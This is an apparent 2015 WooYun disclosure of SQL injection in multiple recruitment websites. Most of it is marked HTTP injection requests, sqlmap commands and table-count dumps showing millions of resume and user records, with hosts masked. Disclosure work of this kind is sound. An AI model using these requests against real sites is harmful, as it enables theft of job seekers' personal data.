当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142175

漏洞标题:多个招聘网站SQL注入(上亿简历泄漏/身份证/电话号码/家庭住址...)

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-09-23 17:52

修复时间:2015-11-09 17:04

公开时间:2015-11-09 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

说了这么我就想打个雷!!!!!!!!!!!!!!!!!!!!!!!!!!
求打雷啊

详细说明:

先上两个通用站的吧
已经证明的链接 修改HOST和Referer 就可以 还有很多啊
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
kefu#**.**.**.**

2.png


resumeID处存在SQL注入

GET /jobseeker/ashx/AjaxValidationHandler.ashx?resumeID=1*&type=modifyResumeAccess&x=0.4393313731998205 HTTP/1.1
Host: **.**.**.**
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDACCBCDAR=CABNIFPBMJNPLDIGCEIPFMKK; ASP.NET_SessionId=2rpl2szvvqatmoojl5ttx0gm
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] 2mdb
[*] 52hotdldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
修改HOST 和 Referer就行了

POST /inc/pingjia.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 427
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDSQCRAQTQ=JNHNJHMCPANDIDJNGNPNBJKH
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=pjtj&f1=1&phone=555-666-0606&t1=%c7%d7%b0%ae%b5%c4%d3%c3%bb%a7%a3%ba%0d%0a%20%20%20%20%ce%d2%c3%c7%bb%e1%c3%bf%cc%ec%b9%d8%d7%a2%c4%fa%b5%c4%bd%a8%d2%e9%b2%a2%cc%e1%b9%a9%b7%b4%c0%a1%a3%ac%b2%bb%b6%cf%d3%c5%bb%af%b2%fa%c6%b7%a3%ac%ce%aa%c4%fa%b8%fc%ba%c3%b5%c4%b7%fe%ce%f1%a1%a3%0d%0a%20%20%20%20%c7%eb%c1%f4%cf%c2%c4%fa%cf%ea%cf%b8%b5%c4%bd%a8%d2%e9%a3%ac%d0%bb%d0%bb%a1%a3



+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.enterprise_accept | 23208901 |
| dbo.enter_down_resume_view | 4732184 |
| dbo.enterprise_cost_view | 3556574 |
| dbo.enter_accept_member | 2320124 |
| dbo.enter_inv_acc_view | 2284692 |
| dbo.ck_resume | 2283051 |
| dbo.ck_resume_cishu | 1941096 |
| dbo.ckresume_ehr_view | 1709990 |
| dbo.resume_information | 629481 |
| dbo.friend_dynamic | 611973 |
| dbo.art_view_list | 495933 |
| dbo.enter_down | 473491 |
| dbo.expo_ckjl | 455808 |
| dbo.TempQRCodes | 445620 |
| dbo.enterprise_cost | 356103 |
| dbo.enter_personal_cost_view | 354974 |
| dbo.enter_cost_view | 354946 |
| dbo.dy_zhoukan_email | 341978 |
| dbo.guzhu_hr_tp | 260633 |
| dbo.Weixin_Record | 219920 |
| dbo.enterprise_ck | 217024 |
| dbo.a_rec | 141802 |
| dbo.art_toupiaolist | 113656 |
| dbo.enterprise_log | 112773 |
| dbo.ehr_member_invite_view | 108253 |
| dbo.enter_invite_member | 108253 |
| dbo.gbook_about | 100889 |
| dbo.enterprise_section | 96307 |
| dbo.cfw_news | 91164 |
| dbo.cfw_news_typenameView | 90937 |
| **.**.**.**_user | 84004 |
| dbo.enter_operation_log | 83878 |
| **.**.**.**_word | 79906 |
| dbo.enterprise_member | 74278 |
| dbo.enter_fq | 72861 |
| dbo.enter_fq_view | 72860 |
| dbo.enterprise_talented_person | 71712 |
| dbo.enter_store_view | 71429 |
| dbo.enter_fq_admin_view | 70166 |
| dbo.enter_sms | 56164 |
| dbo.SM | 55235 |
| dbo.cfw_salary_all | 44497 |
| dbo.Desktop | 39382 |
| dbo.dy_zhoukan | 36676 |
| dbo.adv_click | 35044 |
| dbo.OptionName | 28267 |
| dbo.baihuolingshou | 27225 |
| dbo.fw_user | 24584 |
| **.**.**.**_tplist | 24270 |
| dbo.guzhu_meiti | 23000 |
| dbo.adv_home_bak | 21829 |
| dbo.blog | 21150 |
| dbo.adv_home_notnull_view | 18628 |
| dbo.adv_home_notnull_view_fb2 | 18628 |

POST /showme/searchOfShowme.do HTTP/1.1
Host: **.**.**.**
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JSESSIONID=aaaVrVXLyBlQG6coh9l-u; isCookie=Tue Sep 15 17:13:04 CST 2015; schName=jdrbjpxu
Connection: Keep-alive
Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
homeTown=0&ID=0&jobFunction1=103000&jobLocation=0&keyWord=e*&location=0&mainCatalog=0&modType=search&reqAge1=18&reqAge2=18&reqDegreeID1=10&reqDegreeID2=10&reqSex=1&reqWorkYear1=-1&reqWorkYear2=-1&schoolName=e


Database: new_tourjob
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.My_WorkExp_Old | 622217 |
| dbo.查询 | 619303 |
| dbo.iResumeManage | 441462 |
| dbo.My_users | 441461 |
| dbo.Mem_Position | 110900 |
| dbo.pub_History | 100365 |
| dbo.memberInviteResume | 100364 |
| dbo.memberRecevResume | 100364 |
| dbo.Mem_Info | 21272 |
| dbo.Mem_Rights | 21272 |
| dbo.Mem_account | 21271 |
| dbo.memberRightAccount | 21271 |
| dbo.memberRightAccount | 21271 |
| dbo.Pwd_20150515 | 20880 |
| dbo.Position_VindicateLog | 12345 |

POST /Register/reg_sec.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCQDCSBRA=BHKAKKLCPLCDMOOHHAMFHDJI
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Address=3137%20Laguna%20Street&City=San%20Francisco&Connector=1&HajaYaXaHa4a2ajafW=1&mainVocation=1&memberType=1&Province=NY&subVocation=1&Telephone=555-666-0606&vuPass=g00dPa%24%24w0rD&XaDa2a4aSagafW=c7RH3W8g*&Xasa4a1a1afW=1


Database: para360
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.crm_InfoLog | 11492516 |
| dbo.del_ProductSupply | 7046973 |
| dbo.log_UserPoint | 4203732 |
| dbo.log_SysSvr | 3865826 |
| dbo.syncobj_0x3737353642383242 | 2747544 |
| dbo.syncobj_0x3739334644423337 | 2747544 |
| dbo.syncobj_0x4230323931443339 | 2747544 |
| dbo.syncobj_0x4343343242423141 | 2747544 |
| dbo.syncobj_0x3939414643463232 | 2467358 |
| dbo.syncobj_0x3333323636314639 | 2467357 |
| dbo.syncobj_0x3436463136364643 | 1576805 |
| dbo.syncobj_0x3535353537383430 | 1576805 |
| dbo.syncobj_0x3545354139453245 | 1576805 |
| dbo.syncobj_0x4135343931413643 | 1576805 |
| dbo.syncobj_0x3437333944353033 | 1550133 |
| dbo.syncobj_0x3645303332464244 | 1550133 |
| dbo.syncobj_0x3735444443363741 | 1550133 |
| dbo.syncobj_0x3345444637453339 | 1455899 |
| dbo.syncobj_0x3739374443413737 | 1455899 |
| dbo.syncobj_0x3739343843333337 | 634001 |
| dbo.syncobj_0x3245453043373030 | 634000 |
| dbo.syncobj_0x3334383544313241 | 634000 |
| dbo.syncobj_0x3242463638343134 | 502393 |
| dbo.syncobj_0x3538333646453836 | 502393 |
| dbo.syncobj_0x4330344142304435 | 502393 |
| dbo.syncobj_0x3333434335443135 | 428039 |
| dbo.syncobj_0x4131364238414345 | 428039 |
| dbo.syncobj_0x4244384135373645 | 341483 |
| dbo.syncobj_0x3035433345453638 | 341482 |
| dbo.syncobj_0x3131423630434346 | 341482 |
| dbo.syncobj_0x3637463633463632 | 341482 |
| dbo.crm_OperLog | 275406 |
| dbo.syncobj_0x4437434233353834 | 246735 |
| dbo.log_DelUser | 204279 |
| dbo.del_UserID_EnterpriseB | 188547 |
| dbo.del_UserID_EnterpriseEx | 182109 |
| dbo.syncobj_0x3034454337364241 | 169134 |
| dbo.syncobj_0x3939323241344138 | 169134 |
| dbo.syncobj_0x4143363743304141 | 169134 |
| dbo.log_GetWorderID | 115795 |
| dbo.syncobj_0x3337354541454144 | 95694 |
| dbo.syncobj_0x3444354438423236 | 72554 |
| dbo.syncobj_0x3632383932443141 | 72554 |
| dbo.syncobj_0x3746333033453131 | 72554 |
| dbo.crm_Contact | 61103 |
| dbo.log_ICLogin | 45706 |
| dbo.syncobj_0x3130443343313242 | 45162 |
| dbo.syncobj_0x3133334145433333 | 45162 |
| dbo.del_ProductBuy | 38967 |
| dbo.syncobj_0x3637414546443845 | 30769 |
| dbo.syncobj_0x3932383236354646 | 30769 |
| dbo.syncobj_0x3537303242423645 | 21612 |
| dbo.syncobj_0x3846453139323733 | 21612 |
| dbo.syncobj_0x4331424244424646 | 21612 |
| dbo.syncobj_0x3032344234444639 | 15240 |
| dbo.syncobj_0x4243444134463430 | 15240 |
| dbo.syncobj_0x4334394533363846 | 15240 |
| dbo.Web_UserTemp | 13821 |
**.**.**.**/jobseeker/stage/FAQ_Question.aspx?id=12
**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6

3.png


POST /inc/pingjia.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 427
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDSQCRAQTQ=JNHNJHMCPANDIDJNGNPNBJKH
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=pjtj&f1=*&phone=555-666-0606&t1=%c7%d7%b0%ae%b5%c4%d3%c3%bb%a7%a3%ba%0d%0a%20%20%20%20%ce%d2%c3%c7%bb%e1%c3%bf%cc%ec%b9%d8%d7%a2%c4%fa%b5%c4%bd%a8%d2%e9%b2%a2%cc%e1%b9%a9%b7%b4%c0%a1%a3%ac%b2%bb%b6%cf%d3%c5%bb%af%b2%fa%c6%b7%a3%ac%ce%aa%c4%fa%b8%fc%ba%c3%b5%c4%b7%fe%ce%f1%a1%a3%0d%0a%20%20%20%20%c7%eb%c1%f4%cf%c2%c4%fa%cf%ea%cf%b8%b5%c4%bd%a8%d2%e9%a3%ac%d0%bb%d0%bb%a1%a3
GET /adclick.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-For: DDCIz8th*
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCASDQADD=NDBJIGMDIOLFCLBEBACEAMGH; safedog-flow-item=604A3B11CE68A798B5D8E076B24238AA; adminpersonid=jyd%2Cjackchiao%2Czhangtaotao%2CCherry333%2C; cIP=122%2E11%2E37%2E59; adminposition=%27394%27%2C
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
available databases [9]:
[*] **.**.**.**
[*] **.**.**.**
[*] cp.**.**.**.**
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: **.**.**.**
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.FkInfo | 9504049 |
| dbo.V_scoreDetial | 2229015 |
| dbo.ViewRestriction | 919876 |
| dbo.perdcb | 765112 |
| dbo.help | 587096 |
| dbo.Sms_warn | 566882 |
| dbo.admin_view_log | 549797 |
| dbo.CompanyCount | 445714 |
| dbo.PutResume | 303573 |
| dbo.InviteFace | 216081 |
| dbo.VIEW_face | 215914 |
| dbo.View_PersonExpAll | 186019 |
| dbo.PersonDegree | 159320 |
| dbo.Person | 157237 |
| dbo.ClientMsg | 108533 |
| dbo.laiyuan | 95868 |
| dbo.Illegal | 91836 |
| dbo.MyVote | 89440 |
| dbo.KeyWords | 88020 |
| dbo.PersonExp | 86903 |
| dbo.Client | 62734 |
| dbo.PersonBase | 61529 |
| dbo.KeyWord | 54969 |
| dbo.adclick | 50783 |
| dbo.VIEW_com_hy | 49414 |
| dbo.Sms_Set | 28452 |
| dbo.WorkSite | 19695 |
| **.**.**.**dcb | 16804 |
| dbo.itemcost | 14016 |
| dbo.Lb_comment | 9150 |
| dbo.Company | 8995 |
| dbo.QQAPI | 8717 |
| dbo.TX_Sms | 7563 |
| dbo.WosVote | 6886 |
| dbo.onLine | 6211 |
| dbo.Sms_pay | 5981 |
| dbo.V_jiaofei | 5783 |
| dbo.Orders | 5414 |
| dbo.guest | 5394 |
| **.**.**.**_largess | 4527 |
| dbo.baoguang | 3972 |
| dbo.key_lib | 3944 |
| dbo.eight | 3101 |
| dbo.invoice | 3099 |
| dbo.CompanyImg | 2870 |
| dbo.Grade | 2636 |
| dbo.Login_Sms | 2333 |
| dbo.ClientChat | 1628 |
| dbo.credit | 1550 |
| dbo.CompanySus | 1493 |
| dbo.CP_Point | 1284 |
| dbo.CP_WS_VIEW | 1087 |
| dbo.SignUp | 887 |
桂聘人才网 **.**.**.**

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 548
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=bqsemnqy&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxZGRoxRJEl%2beh46Js34/3QHajtXyNmA%3d%3d


http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
南宁人才网 http://**.**.**.**/

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JobViewCount=/job/818209-153003.html; userHabit_temp=userFrom=/job/818209-153003.html; ASP.NET_SessionId=21gkizvz1l000m2w3ktefu2b; CorpJob=%257c1%257c1%257c-1%257c-1%257c284%257c%257c%257c1%257c1%257c-1; InfoViewCount=/info/2013_01/04_14/3317.html; ResumeViewCount=/859850.html; AdletJob=%257c-1%257c284
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


第三处:http://**.**.**.**/

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


北海人才网
**.**.**.**

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad
%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd
%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a
%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d
%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc
%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM
2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y
%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d
http://**.**.**.**/
POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad
%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd
%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a
%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d
%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc
%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM
2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y
%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


漏洞证明:

C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/company/prodetail.ph
p?id=29325&company_id=63328" -p "id" -D sq_chinamrong --tables –count
Database: sq_chinamrong
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| cdb_members | 912179 |
| member | 911576 |
| trade_leads | 327541 |
| company | 213190 |
| cdb_uc_memberfields | 154887 |
| cdb_uc_members | 154884 |
| member_log | 108934 |
| cdb_memberfields | 106433 |
| cdb_memberspaces | 56251 |
| cdb_spacecaches | 37604 |
| trade_contact | 36038 |
| product_msg | 26703 |
| cdb_posts | 24868 |
| news | 22476 |
| sales_keyword | 16678 |
| trade_keyword | 12035 |
| cdb_uc_mergemembers | 9999 |
C:\Python27\sqlmap>sqlmap.py -u "**.**.**.**/jobseeker/stage/FAQ_Question.asp
x?id=12" -D medejobdb --tables –count
Database: medejobdb
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Experience | 150719 |
| dbo.Intention | 109221 |
| dbo.VIEW_QUERYRESUME | 99492 |
| dbo.JobseekerUser | 95926 |
| dbo.Education | 92952 |
| dbo.view_resume | 84956 |
| dbo.Resume | 84868 |
| dbo.view_resumeUnionju | 84863 |
| dbo.Position | 53224 |
| dbo.View_DepartPosList | 53224 |
| dbo.VIEW_POSITION | 51442 |
| dbo.CompanyStat | 35116 |
| dbo.VIEW_COMPANYSTAT | 34971 |
| dbo.Baidu_xml | 31801 |
| dbo.Temp_ImportResume | 30737 |
**.**.**.**/addMessage.do?id=8a28897b42078619014208c9bc9a0dc0&mailType=1&siteId=g*&type=0
Database: zzrcjob
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.ZZRC_ARCHIVES | 345582 |
| dbo.YJY_ENCRYPTIONLOG | 166653 |
| dbo.YJY_LOG | 62987 |
| dbo.ZZRC_PERSONAL | 52746 |
| dbo.YJY_INFOMAPHITCOUNTER | 27210 |
| dbo.ZZRC_ZQZ_RESULT | 19524 |
| dbo.ZZRC_PERSON_LOG | 18135 |
**.**.**.**/Handler/Company.ashx?action=getTypeT&id=1*
**.**.**.**/Handler/index.ashx?action=GetPostJobList&id=1*
Database: BPMS_OA
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.BPMS_SysLogDetails | 28512725 |
| dbo.sys_AssCount | 11238631 |
| dbo.gr_browsecount | 7474553 |
| dbo.BPMS_SysLogs | 5068655 |
| dbo.user_platform | 3756592 |
| dbo.sys_AssPos | 3734739 |
| dbo.HuoDong | 2647007 |
| dbo.OA_history | 1722208 |
| dbo._dta_mv_102 | 1192857 |
| dbo._dta_mv_38 | 1192857 |
| dbo.gr_pos_viewcount | 1156439 |
| dbo.gr_search | 971523 |
| dbo.HR_Offer | 773733 |
| dbo.gr_user | 709071 |
| dbo.HR_PeopleInfo | 646892 |
| dbo.gr_resume | 491198 |
| dbo.visitTable | 484991 |
| dbo.gr_company | 358867 |
| dbo._dta_mv_0 | 322868 |
| dbo._dta_mv_1 | 322868 |
| dbo.gr_LoginList | 269936 |
| dbo.MobileAddress | 263017 |
| dbo.Com_Cooperation | 214467 |
| dbo.user_sort | 193427 |
| dbo.Resume_Name | 154727 |
| dbo.gr_resume_folder | 153666 |
| dbo._dta_mv_9 | 153608 |
| dbo._dta_mv_5 | 149901 |
| dbo._dta_mv_85 | 148085 |
| dbo.OA_CallStatus | 143955 |
| dbo._dta_mv_12 | 143841 |
| dbo._dta_mv_13 | 143841 |
| dbo._dta_mv_6 | 143801 |
| dbo._dta_mv_7 | 143801 |
| dbo._dta_mv_21 | 143105 |
| dbo._dta_mv_86 | 143105 |
| dbo._dta_mv_34 | 138760 |
| dbo._dta_mv_99 | 138760 |
| dbo.OA_Salary | 85120 |
| dbo._dta_mv_105 | 83082 |
| dbo._dta_mv_41 | 83082 |
| dbo._dta_mv_106 | 82710 |
| dbo._dta_mv_42 | 82710 |
| dbo._dta_mv_22 | 82464 |
| dbo._dta_mv_87 | 82464 |
| dbo.BPMS_SysLoginLog | 82153 |
| dbo._dta_mv_11 | 80860 |
| dbo._dta_mv_3 | 80837 |
| dbo.gr_res_val | 80158 |
| **.**.**.**Panytemp | 71799 |
| dbo._dta_mv_14 | 69112 |
| dbo._dta_mv_8 | 69083 |
| dbo.gr_resume_visit | 68651 |
| dbo._dta_mv_4 | 67720 |
| dbo._dta_mv_23 | 66986 |
| dbo._dta_mv_88 | 66986 |
| dbo.gr_action | 56663 |
| dbo.AppVisitList | 56003 |
| dbo.BPMS_DownloadAss | 45910 |
| dbo._dta_mv_100 | 43413 |
| dbo._dta_mv_35 | 43413 |
| dbo.resume_dynamic | 40249 |
| dbo.Journal | 39668 |
| dbo.sys_area | 38592 |
| dbo.gr_experience | 37688 |
| dbo.KPI | 37631 |
| dbo._dta_mv_10 | 37250 |
| dbo._dta_mv_2 | 37242 |
| dbo.score_history | 31728 |
| dbo.gr_Integral | 24149 |
| dbo.gr_comremark | 24074 |
| dbo.Com_History | 20833 |
| dbo.OA_user_face | 17176 |
| dbo.OA_user_face_time | 17012 |
| dbo._dta_mv_121 | 16688 |
| dbo._dta_mv_61 | 16688 |
| dbo.BaiduItem | 15881 |
| dbo._dta_mv_133 | 15381 |
| dbo._dta_mv_73 | 15381 |
| dbo.gr_position | 15015 |
| dbo._dta_mv_28 | 14989 |
| dbo._dta_mv_30 | 14989 |
| dbo._dta_mv_93 | 14989 |
| dbo._dta_mv_95 | 14989 |
| dbo._dta_mv_122 | 14981 |
| dbo._dta_mv_62 | 14981 |
| dbo.gr_PinBi | 14569 |
| dbo._dta_mv_127 | 13131 |
| dbo._dta_mv_129 | 13131 |
| dbo._dta_mv_67 | 13131 |
| dbo._dta_mv_69 | 13131 |
| dbo.OA_Contract_bak | 13068 |
